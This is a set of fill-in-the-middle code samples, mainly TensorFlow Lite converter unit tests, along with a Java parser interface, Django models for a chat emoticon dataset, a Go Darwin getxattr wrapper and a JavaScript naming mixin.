graphviz_dir converter.dump_graphviz_video = True tflite_model = converter.convert() self.assertTrue(tflite_model) # Ensure graphviz folder has more data after using video flag. num_items_graphviz_video = len(os.listdir(graphviz_dir)) self.assertTrue(num_items_graphviz_video > num_items_graphviz) def testInferenceInputType(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) converter.inference_input_type = lite_constants.QUANTIZED_UINT8 converter.quantized_input_stats = {'Placeholder': (0., 1.)} # mean, std_dev tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('Placeholder', input_details[0]['name']) self.assertEqual(np.uint8, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((1., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) def testDefaultRangesStats(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) converter.inference_type = lite_constants.QUANTIZED_UINT8 converter.quantized_input_stats = {'Placeholder': (0., 1.)} # mean, std_dev converter.default_ranges_stats = (0, 6) # min, max tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. 
interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('Placeholder', input_details[0]['name']) self.assertEqual(np.uint8, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((1., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.uint8, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertTrue(output_details[0]['quantization'][0] > 0) # scale def testPostTrainingQuantize(self): np.random.seed(0) # We need the tensor to have more than 1024 elements for quantize_weights # to kick in. Thus, the [33, 33] shape. in_tensor_1 = array_ops.placeholder( shape=[33, 33], dtype=dtypes.float32, name='inputA') in_tensor_2 = constant_op.constant( np.random.uniform(low=-10., high=10., size=(33, 33)), shape=[33, 33], dtype=dtypes.float32, name='inputB') out_tensor = math_ops.matmul(in_tensor_1, in_tensor_2, name='output') sess = session.Session() # Convert float model. float_converter = lite.TocoConverter.from_session(sess, [in_tensor_1], [out_tensor]) float_tflite = float_converter.convert() self.assertTrue(float_tflite) # Convert quantized weights model. quantized_converter = lite.TocoConverter.from_session( sess, [in_tensor_1], [out_tensor]) quantized_converter.post_training_quantize = True quantized_tflite = quantized_converter.convert() self.assertTrue(quantized_tflite) # Ensure that the quantized weights tflite model is smaller. self.assertTrue(len(quantized_tflite) < len(float_tflite)) def testExtendedMode(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) out_tensor = in_tensor + in_tensor sess = session.Session() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor]) converter.converter_mode = lite.ConverterMode.TOCO_EXTENDED_ALL tflite_model = converter.convert() self.assertTrue(tflite_model) # Ensures the model contains TensorFlow ops. # TODO(nupurgarg): Check values once there is a Python delegate interface. interpreter = Interpreter(model_content=tflite_model) with self.assertRaises(RuntimeError) as error: interpreter.allocate_tensors() self.assertIn( 'Regular TensorFlow ops are not supported by this interpreter. Make ' 'sure you invoke the Eager delegate before inference.', str(error.exception)) class FromFrozenGraphFile(test_util.TensorFlowTestCase): def testFloat(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) _ = in_tensor + in_tensor sess = session.Session() # Write graph to file. graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb') write_graph(sess.graph_def, '', graph_def_file, False) sess.close() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'], ['add']) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. 
interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('Placeholder', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) def testFloatWithShapesArray(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) _ = in_tensor + in_tensor sess = session.Session() # Write graph to file. graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb') write_graph(sess.graph_def, '', graph_def_file, False) sess.close() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_frozen_graph( graph_def_file, ['Placeholder'], ['add'], input_shapes={'Placeholder': [1, 16, 16, 3]}) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) def testFreezeGraph(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) var = variable_scope.get_variable( 'weights', shape=[1, 16, 16, 3], dtype=dtypes.float32) _ = in_tensor + var sess = session.Session() # Write graph to file. graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb') write_graph(sess.graph_def, '', graph_def_file, False) sess.close() # Ensure the graph with variables cannot be converted. with self.assertRaises(ValueError) as error: lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'], ['add']) self.assertEqual('Please freeze the graph using freeze_graph.py.', str(error.exception)) def testPbtxt(self): in_tensor = array_ops.placeholder( shape=[1, 16, 16, 3], dtype=dtypes.float32) _ = in_tensor + in_tensor sess = session.Session() # Write graph to file. graph_def_file = os.path.join(self.get_temp_dir(), 'model.pbtxt') write_graph(sess.graph_def, '', graph_def_file, True) sess.close() # Convert model and ensure model is not None. converter = lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'], ['add']) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. 
interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('Placeholder', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) def testInvalidFileNotFound(self): with self.assertRaises(IOError) as error: lite.TocoConverter.from_frozen_graph('invalid_file', ['Placeholder'], ['add']) self.assertEqual('File \'invalid_file\' does not exist.', str(error.exception)) def testInvalidFileBadData(self): graph_def_file = os.path.join(self.get_temp_dir(), 'invalid_file') with gfile.Open(graph_def_file, 'wb') as temp_file: temp_file.write('bad data') temp_file.flush() # Attempts to convert the invalid model. with self.assertRaises(IOError) as error: lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'], ['add']) self.assertEqual( 'Unable to parse input file \'{}\'.'.format(graph_def_file), str(error.exception)) # TODO(nupurgarg): Test model loading in open source. def _initObjectDetectionArgs(self): # Initializes the arguments required for the object detection model. self._graph_def_file = resource_loader.get_path_to_datafile( 'testdata/tflite_graph.pb') self._input_arrays = ['normalized_input_image_tensor'] self._output_arrays = [ 'TFLite_Detection_PostProcess', 'TFLite_Detection_PostProcess:1', 'TFLite_Detection_PostProcess:2', 'TFLite_Detection_PostProcess:3' ] self._input_shapes = {'normalized_input_image_tensor': [1, 300, 300, 3]} def testTFLiteGraphDef(self): # Tests the object detection model that cannot be loaded in TensorFlow. self._initObjectDetectionArgs() converter = lite.TocoConverter.from_frozen_graph( self._graph_def_file, self._input_arrays, self._output_arrays, self._input_shapes) converter.allow_custom_ops = True tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. 
interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('normalized_input_image_tensor', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 300, 300, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(4, len(output_details)) self.assertEqual('TFLite_Detection_PostProcess', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 10, 4] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) self.assertEqual('TFLite_Detection_PostProcess:1', output_details[1]['name']) self.assertTrue(([1, 10] == output_details[1]['shape']).all()) self.assertEqual('TFLite_Detection_PostProcess:2', output_details[2]['name']) self.assertTrue(([1, 10] == output_details[2]['shape']).all()) self.assertEqual('TFLite_Detection_PostProcess:3', output_details[3]['name']) self.assertTrue(([1] == output_details[3]['shape']).all()) def testTFLiteGraphDefMissingShape(self): # Tests invalid cases for the model that cannot be loaded in TensorFlow. self._initObjectDetectionArgs() # Missing `input_shapes`. with self.assertRaises(ValueError) as error: lite.TocoConverter.from_frozen_graph( self._graph_def_file, self._input_arrays, self._output_arrays) self.assertEqual('input_shapes must be defined for this model.', str(error.exception)) def testTFLiteGraphDefInvalidShape(self): # Tests invalid cases for the model that cannot be loaded in TensorFlow. self._initObjectDetectionArgs() # `input_shapes` does not contain the names in `input_arrays`. with self.assertRaises(ValueError) as error: lite.TocoConverter.from_frozen_graph( self._graph_def_file, self._input_arrays, self._output_arrays, input_shapes={'invalid-value': [1, 19]}) self.assertEqual( 'input_shapes must contain a value for each item in input_array.', str(error.exception)) class FromSavedModelTest(test_util.TensorFlowTestCase): def _createSavedModel(self, shape): """Create a simple SavedModel.""" saved_model_dir = os.path.join(self.get_temp_dir(), 'simple_savedmodel') with session.Session() as sess: in_tensor_1 = array_ops.placeholder( shape=shape, dtype=dtypes.float32, name='inputB') in_tensor_2 = array_ops.placeholder( shape=shape, dtype=dtypes.float32, name='inputA') out_tensor = in_tensor_1 + in_tensor_2 inputs = {'x': in_tensor_1, 'y': in_tensor_2} outputs = {'z': out_tensor} saved_model.simple_save(sess, saved_model_dir, inputs, outputs) return saved_model_dir def testSimpleModel(self): """Test a SavedModel.""" saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3]) # Convert model and ensure model is not None. 
converter = lite.TocoConverter.from_saved_model(saved_model_dir) tflite_model = converter.convert() self.assertTrue(tflite_model) interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(2, len(input_details)) self.assertEqual('inputA', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) self.assertEqual('inputB', input_details[1]['name']) self.assertEqual(np.float32, input_details[1]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all()) self.assertEqual((0., 0.), input_details[1]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) def testNoneBatchSize(self): """Test a SavedModel, with None in input tensor's shape.""" saved_model_dir = self._createSavedModel(shape=[None, 16, 16, 3]) converter = lite.TocoConverter.from_saved_model(saved_model_dir) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(2, len(input_details)) self.assertEqual('inputA', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) self.assertEqual('inputB', input_details[1]['name']) self.assertEqual(np.float32, input_details[1]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all()) self.assertEqual((0., 0.), input_details[1]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) def testOrderInputArrays(self): """Test a SavedModel ordering of input arrays.""" saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3]) converter = lite.TocoConverter.from_saved_model( saved_model_dir, input_arrays=['inputB', 'inputA']) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. 
interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(2, len(input_details)) self.assertEqual('inputA', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) self.assertEqual('inputB', input_details[1]['name']) self.assertEqual(np.float32, input_details[1]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all()) self.assertEqual((0., 0.), input_details[1]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) def testSubsetInputArrays(self): """Test a SavedModel with a subset of the input array names of the model.""" saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3]) # Check case where input shape is given. converter = lite.TocoConverter.from_saved_model( saved_model_dir, input_arrays=['inputA'], input_shapes={'inputA': [1, 16, 16, 3]}) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check case where input shape is None. converter = lite.TocoConverter.from_saved_model( saved_model_dir, input_arrays=['inputA'], input_shapes={'inputA': None}) tflite_model = converter.convert() self.assertTrue(tflite_model) class FromKerasFile(test_util.TensorFlowTestCase): def setUp(self): keras.backend.clear_session() def _getSequentialModel(self): with session.Session().as_default(): model = keras.models.Sequential() model.add(keras.layers.Dense(2, input_shape=(3,))) model.add(keras.layers.RepeatVector(3)) model.add(keras.layers.TimeDistributed(keras.layers.Dense(3))) model.compile( loss=keras.losses.MSE, optimizer=keras.optimizers.RMSprop(), metrics=[keras.metrics.categorical_accuracy], sample_weight_mode='temporal') x = np.random.random((1, 3)) y = np.random.random((1, 3, 3)) model.train_on_batch(x, y) model.predict(x) try: fd, keras_file = tempfile.mkstemp('.h5') keras.models.save_model(model, keras_file) finally: os.close(fd) return keras_file def testSequentialModel(self): """Test a Sequential tf.keras model with default inputs.""" keras_file = self._getSequentialModel() converter = lite.TocoConverter.from_keras_model_file(keras_file) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check tensor details of converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('dense_input', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('time_distributed/Reshape_1', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 3, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) # Check inference of converted model. 
input_data = np.array([[1, 2, 3]], dtype=np.float32) interpreter.set_tensor(input_details[0]['index'], input_data) interpreter.invoke() tflite_result = interpreter.get_tensor(output_details[0]['index']) keras_model = keras.models.load_model(keras_file) keras_result = keras_model.predict(input_data) np.testing.assert_almost_equal(tflite_result, keras_result, 5) os.remove(keras_file) def testSequentialModelInputArray(self): """Test a Sequential tf.keras model testing input arrays argument.""" keras_file = self._getSequentialModel() # Invalid input array raises error. with self.assertRaises(ValueError) as error: lite.TocoConverter.from_keras_model_file( keras_file, input_arrays=['invalid-input']) self.assertEqual("Invalid tensors 'invalid-input' were found.", str(error.exception)) # Valid input array. converter = lite.TocoConverter.from_keras_model_file( keras_file, input_arrays=['dense_input']) tflite_model = converter.convert() os.remove(keras_file) self.assertTrue(tflite_model) def testSequentialModelInputShape(self): """Test a Sequential tf.keras model testing input shapes argument.""" keras_file = self._getSequentialModel() # Passing in shape of invalid input array has no impact as long as all input # arrays have a shape. converter = lite.TocoConverter.from_keras_model_file( keras_file, input_shapes={'invalid-input': [2, 3]}) tflite_model = converter.convert() self.assertTrue(tflite_model) # Passing in shape of valid input array. converter = lite.TocoConverter.from_keras_model_file( keras_file, input_shapes={'dense_input': [2, 3]}) tflite_model = converter.convert() os.remove(keras_file) self.assertTrue(tflite_model) # Check input shape from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('dense_input', input_details[0]['name']) self.assertTrue(([2, 3] == input_details[0]['shape']).all()) def testSequentialModelOutputArray(self): """Test a Sequential tf.keras model testing output arrays argument.""" keras_file = self._getSequentialModel() # Invalid output array raises error. with self.assertRaises(ValueError) as error: lite.TocoConverter.from_keras_model_file( keras_file, output_arrays=['invalid-output']) self.assertEqual("Invalid tensors 'invalid-output' were found.", str(error.exception)) # Valid output array. converter = lite.TocoConverter.from_keras_model_file( keras_file, output_arrays=['time_distributed/Reshape_1']) tflite_model = converter.convert() os.remove(keras_file) self.assertTrue(tflite_model) def testFunctionalModel(self): """Test a Functional tf.keras model with default inputs.""" with session.Session().as_default(): inputs = keras.layers.Input(shape=(3,), name='input') x = keras.layers.Dense(2)(inputs) output = keras.layers.Dense(3)(x) model = keras.models.Model(inputs, output) model.compile( loss=keras.losses.MSE, optimizer=keras.optimizers.RMSprop(), metrics=[keras.metrics.categorical_accuracy]) x = np.random.random((1, 3)) y = np.random.random((1, 3)) model.train_on_batch(x, y) model.predict(x) fd, keras_file = tempfile.mkstemp('.h5') try: keras.models.save_model(model, keras_file) finally: os.close(fd) # Convert to TFLite model. converter = lite.TocoConverter.from_keras_model_file(keras_file) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check tensor details of converted model. 
interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('input', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('dense_1/BiasAdd', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) # Check inference of converted model. input_data = np.array([[1, 2, 3]], dtype=np.float32) interpreter.set_tensor(input_details[0]['index'], input_data) interpreter.invoke() tflite_result = interpreter.get_tensor(output_details[0]['index']) keras_model = keras.models.load_model(keras_file) keras_result = keras_model.predict(input_data) np.testing.assert_almost_equal(tflite_result, keras_result, 5) os.remove(keras_file) def testFunctionalModelMultipleInputs(self): """Test a Functional tf.keras model with multiple inputs and outputs.""" with session.Session().as_default(): a = keras.layers.Input(shape=(3,), name='input_a') b = keras.layers.Input(shape=(3,), name='input_b') dense = keras.layers.Dense(4, name='dense') c = dense(a) d = dense(b) e = keras.layers.Dropout(0.5, name='dropout')(c) model = keras.models.Model([a, b], [d, e]) model.compile( loss=keras.losses.MSE, optimizer=keras.optimizers.RMSprop(), metrics=[keras.metrics.mae], loss_weights=[1., 0.5]) input_a_np = np.random.random((10, 3)) input_b_np = np.random.random((10, 3)) output_d_np = np.random.random((10, 4)) output_e_np = np.random.random((10, 4)) model.train_on_batch([input_a_np, input_b_np], [output_d_np, output_e_np]) model.predict([input_a_np, input_b_np], batch_size=5) fd, keras_file = tempfile.mkstemp('.h5') try: keras.models.save_model(model, keras_file) finally: os.close(fd) # Convert to TFLite model. converter = lite.TocoConverter.from_keras_model_file(keras_file) tflite_model = converter.convert() self.assertTrue(tflite_model) os.remove(keras_file) # Check values from converted model. 
interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(2, len(input_details)) self.assertEqual('input_a', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) self.assertEqual('input_b', input_details[1]['name']) self.assertEqual(np.float32, input_details[1]['dtype']) self.assertTrue(([1, 3] == input_details[1]['shape']).all()) self.assertEqual((0., 0.), input_details[1]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(2, len(output_details)) self.assertEqual('dense_1/BiasAdd', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 4] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) self.assertEqual('dropout/Identity', output_details[1]['name']) self.assertEqual(np.float32, output_details[1]['dtype']) self.assertTrue(([1, 4] == output_details[1]['shape']).all()) self.assertEqual((0., 0.), output_details[1]['quantization']) def testFunctionalSequentialModel(self): """Test a Functional tf.keras model containing a Sequential model.""" with session.Session().as_default(): model = keras.models.Sequential() model.add(keras.layers.Dense(2, input_shape=(3,))) model.add(keras.layers.RepeatVector(3)) model.add(keras.layers.TimeDistributed(keras.layers.Dense(3))) model = keras.models.Model(model.input, model.output) model.compile( loss=keras.losses.MSE, optimizer=keras.optimizers.RMSprop(), metrics=[keras.metrics.categorical_accuracy], sample_weight_mode='temporal') x = np.random.random((1, 3)) y = np.random.random((1, 3, 3)) model.train_on_batch(x, y) model.predict(x) model.predict(x) fd, keras_file = tempfile.mkstemp('.h5') try: keras.models.save_model(model, keras_file) finally: os.close(fd) # Convert to TFLite model. converter = lite.TocoConverter.from_keras_model_file(keras_file) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check tensor details of converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('dense_input', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('time_distributed/Reshape_1', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 3, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) # Check inference of converted model. input_data = np.array([[1, 2, 3]], dtype=np.float32) interpreter.set_tensor(input_details[0]['index'], input_data) interpreter.invoke() tflite_result = interpreter.get_tensor(output_details[0]['index']) keras_model = keras.models.load_model(keras_file) keras_result = keras_model.predict(input_data) np.testing.assert_almost_equal(tflite_result, keras_result, 5) os.remove(keras_file) if __name__ == '__main__': test.main()<|fim▁end|>
self.assertEqual('Placeholder', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
<|file_name|>Parser.java<|end_file_name|><|fim▁begin|>package com.real.estate.parser; import org.jsoup.nodes.Element; import java.util.List; /** * Created by Snayki on 22.03.2016. */ public interface Parser<T> {<|fim▁hole|>}<|fim▁end|>
List<Element> parse(); T createFromElement(Element element);
<|file_name|>models.py<|end_file_name|><|fim▁begin|>import operator from django.db import models from django.db.models import Q from django.db.models import Count from caching.base import CachingManager, CachingMixin from emoticonvis.apps.base import models as base_models from emoticonvis.apps.corpus import utils import numpy class Dataset(models.Model): """A top-level dataset object containing messages.""" name = models.CharField(max_length=150) """The name of the dataset""" description = models.TextField() """A description of the dataset.""" created_at = models.DateTimeField(auto_now_add=True) """The :py:class:`datetime.datetime` when the dataset was created.""" start_time = models.DateTimeField(null=True, default=None, blank=True) """The time of the first real message in the dataset""" end_time = models.DateTimeField(null=True, default=None, blank=True) """The time of the last real message in the dataset""" @property def message_count(self): return self.message_set.count() def __unicode__(self): return self.name<|fim▁hole|> def get_messages_from_selected_participants(self): return self.messages.filter(participant__is_selected=True).distinct() def get_emoticons_from_selected_participants(self): return Emoticon.objects.filter(messages__participant__is_selected=True).distinct() class Emoticon(models.Model): """A code of a message""" text = base_models.Utf8CharField(max_length=200) """The text of the emoticon""" VALENCE_CHOICES = ( ('P', 'Positive'), ('N', 'Negative'), ('O', 'Neutral'), ('U', 'Unknown'), ) valence = models.CharField(max_length=1, choices=VALENCE_CHOICES, default='U') def __repr__(self): return self.text def __unicode__(self): return self.__repr__() class Participant(models.Model): """A code of a message""" dataset = models.ForeignKey(Dataset, default=1) """Which :class:`Dataset` the message belongs to""" name = models.CharField(max_length=100, blank=True) """The name of the participant""" LANG_CHOICES = ( ('No', 'Not specified'), ('En', 'English'), ('Fr', 'French'), ) language = models.CharField(max_length=2, choices=LANG_CHOICES, default='No') STATUS_CHOICES = ( ('No', 'Not specified'), ('Jr', 'Junior'), ('Sr', 'Senior'), ) status = models.CharField(max_length=2, choices=STATUS_CHOICES, default='No') position = models.CharField(max_length=32, default=None, null=True) is_selected = models.BooleanField(default=True) def __repr__(self): return self.text def __unicode__(self): return self.__repr__() class LanguageSession(models.Model): """ A language session is a continuous time period when participants in the session stay the same """ dataset = models.ForeignKey(Dataset) """Which :class:`Dataset` the message belongs to""" start_time = models.DateTimeField(null=True, blank=True, default=None) """The :py:class:`datetime.datetime` (in UTC) when the language session starts""" end_time = models.DateTimeField(null=True, blank=True, default=None) """The :py:class:`datetime.datetime` (in UTC) when the language session ends""" participants = models.ManyToManyField(Participant, related_name="lang_sessions") num_en = models.IntegerField(default=0) num_fr = models.IntegerField(default=0) en_proportion = models.FloatField(default=0) TYPE_CHOICES = ( ('E only', 'E only'), ('major E', 'major E'), ('major F', 'major F'), ('F only', 'F only'), ('Empty', 'Empty') ) type = models.CharField(max_length=8, choices=TYPE_CHOICES, default=None, null=True) class Message(models.Model): """ The Message is the central data entity for the dataset. 
""" dataset = models.ForeignKey(Dataset) """Which :class:`Dataset` the message belongs to""" idx = models.IntegerField(null=True, blank=True, default=None) """The index of the message""" time = models.DateTimeField(null=True, blank=True, default=None) """The :py:class:`datetime.datetime` (in UTC) when the message was sent""" session_id = models.IntegerField(null=True, blank=True, default=None) """The session of the message""" TYPE_CHOICES = ( (0, 'Normal message'), (1, 'Someone joined'), (2, 'Someone left'), (3, 'Bert message'), (4, 'Starting log'), ) type = models.IntegerField(max_length=1, choices=TYPE_CHOICES, default=0) participant = models.ForeignKey(Participant, related_name="messages", default=None, null=True) text = base_models.Utf8TextField(null=True, blank=True, default="") """The actual text of the message.""" emoticons = models.ManyToManyField(Emoticon, related_name="messages") lang_session = models.ForeignKey(LanguageSession, related_name="messages", default=None, null=True) LANG_CHOICES = ( ('No', 'Not specified'), ('En', 'English'), ('Fr', 'French'), ) detected_language = models.CharField(max_length=2, choices=LANG_CHOICES, default='No') def __repr__(self): return self.text def __unicode__(self): return self.__repr__()<|fim▁end|>
<|file_name|>unionfs_xattr_test_darwin.go<|end_file_name|><|fim▁begin|>// Copyright 2016 the Go-FUSE Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package unionfs import ( "syscall" "unsafe" ) // Darwin doesn't have support for syscall.Getxattr() so we pull it into its own file and implement it by hand on Darwin. func Getxattr(path string, attr string, dest []byte) (sz int, err error) { var _p0 *byte _p0, err = syscall.BytePtrFromString(path) if err != nil { return } var _p1 *byte _p1, err = syscall.BytePtrFromString(attr) if err != nil { return } var _p2 unsafe.Pointer if len(dest) > 0 { _p2 = unsafe.Pointer(&dest[0]) } else { var _zero uintptr _p2 = unsafe.Pointer(&_zero) } r0, _, e1 := syscall.Syscall6(syscall.SYS_GETXATTR, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(_p1)), uintptr(_p2), uintptr(len(dest)), 0, 0) sz = int(r0)<|fim▁hole|>}<|fim▁end|>
if e1 != 0 { err = e1 } return
<|file_name|>NamingMixin.js<|end_file_name|><|fim▁begin|>const NamingMixin = { _name: null, getName() { return this._name; },<|fim▁hole|> _shortName: null, getShortName() { return this._shortName || this.getName(); }, _abbreviation: null, getAbbreviation() { return this._abbreviation || this.getShortName(); }, }; export default NamingMixin;<|fim▁end|>
